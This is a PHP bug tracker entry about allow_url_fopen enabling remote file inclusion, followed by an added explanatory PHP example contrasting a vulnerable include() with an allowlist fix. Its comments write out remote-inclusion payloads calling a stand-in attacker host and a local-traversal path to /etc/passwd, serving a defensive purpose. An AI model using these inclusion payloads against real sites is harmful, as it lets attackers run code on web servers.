ID: 41156
Updated by: [EMAIL PROTECTED]
Reported By: c dot heutger at psw dot net
-Status: Open
+Status: Closed
Bug Type: PHP options/info functions
Operating System: irrelevant
PHP Version: 4.4.6
New Comment:
This issue was addressed in the latest 5.2.x releases by disallowing the use of remote files in include statements by default.

Previous Comments:
------------------------------------------------------------------------
[2007-04-21 09:37:34] c dot heutger at psw dot net

Description:
------------
Meanwhile you have installed a big warning in the PHP installation about register_globals and defaulted it to off, but there is no warning at all for url_fopen, and it is on by default, although, with the use of includes, this variable opens a door from outside into your applications for any hacker (e.g. as used by opensurveypilot). So we have had many hack-ins lately, as this variable is on, either by the default installation or by templates like those distributed via SWsoft's Virtuozzo or with Plesk. This value should be warned about in the same way and set to off by default, like register_globals.

Reproduce code:
---------------
Try to refer to any http:// resource in e.g. the opensurveypilot files using include while url_fopen is on.

Expected result:
----------------
Hacked sites if it stays like this; url_fopen off by default in future PHP versions.

Actual result:
--------------
A big security hole for lame code and programmers is still open.
------------------------------------------------------------------------
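The pattern the report is about, shown as an added example (this is not code from the bug report, from PHP, or from opensurveypilot; the function names, the page names and the templates/ directory are invented for illustration). The first function is the remote-file-inclusion shape the reporter describes: a request parameter flows straight into include(). On PHP before 5.2.0 the only switch that stopped include() from fetching http:// and ftp:// sources was allow_url_fopen, which is why the reporter asks for it to default to off; 5.2.0 split out a separate allow_url_include directive, off by default, which is the fix the maintainer's comment refers to. The second function is the hardened form, which does not rely on either directive.

```php
<?php
// Added example, not from the original bug report.
//
// php.ini, before 5.2.0: allow_url_fopen = On (the default) let include()
// pull http:// and ftp:// sources; turning it Off was the only mitigation,
// at the cost of also breaking file_get_contents('http://...') and friends.
//
// php.ini, 5.2.0 and later:
//   allow_url_fopen   = On    ; still the default; URL wrappers in fopen()-style calls
//   allow_url_include = Off   ; default; include/require refuse http://, ftp://,
//                             ; data: and php://input sources
//
// allow_url_include = Off only blocks URL wrappers. Local file inclusion
// (../../etc/passwd, an uploaded file under the web root) still works against
// the vulnerable function below, so the allowlist in the safe version is what
// actually closes the hole.

// VULNERABLE: the request decides what gets executed.
// With allow_url_include=On (or allow_url_fopen=On before 5.2.0),
//   ?page=http://attacker.example/shell.txt%00   (pre-5.3.4 null byte trick)
//   ?page=http://attacker.example/shell
// makes PHP download and run attacker code as the web server user.
function render_page_unsafe($page)
{
    include $page . '.php';
}

// HARDENED: map an opaque page name to a fixed file; no user-supplied string
// ever reaches include(), so neither remote nor local traversal is possible.
// (Hypothetical page names and templates/ directory for the example.)
function render_page_safe($page)
{
    $templates = array(
        'home'    => 'home.php',
        'survey'  => 'survey.php',
        'results' => 'results.php',
    );

    if (!is_string($page) || !isset($templates[$page])) {
        header('HTTP/1.0 404 Not Found');
        return false;
    }

    $path = __DIR__ . '/templates/' . $templates[$page];
    include $path;
    return true;
}

// Ops check: report the two directives as this PHP sees them. ini_get()
// returns the raw string ("1", "0", "" ...), hence the cast.
// The reporter's hosting templates (Virtuozzo, Plesk) are exactly where this
// is worth verifying, since a template can ship its own php.ini.
function url_wrapper_settings()
{
    return array(
        'allow_url_fopen'   => (bool) ini_get('allow_url_fopen'),
        'allow_url_include' => (bool) ini_get('allow_url_include'),
    );
}

// Usage, e.g. as an index.php front controller:
//   $page = isset($_GET['page']) ? $_GET['page'] : 'home';
//   render_page_safe($page);
//
// Or on the command line to audit a host:
//   php -r 'require "example.php"; var_export(url_wrapper_settings());'
```

The allowlist approach is the one to prefer over trying to sanitise the path (stripping "://", rejecting "..", and so on), because PHP's stream wrappers, null-byte handling on old releases and path normalisation give an attacker several ways around string filters that an explicit map of known page names simply does not expose.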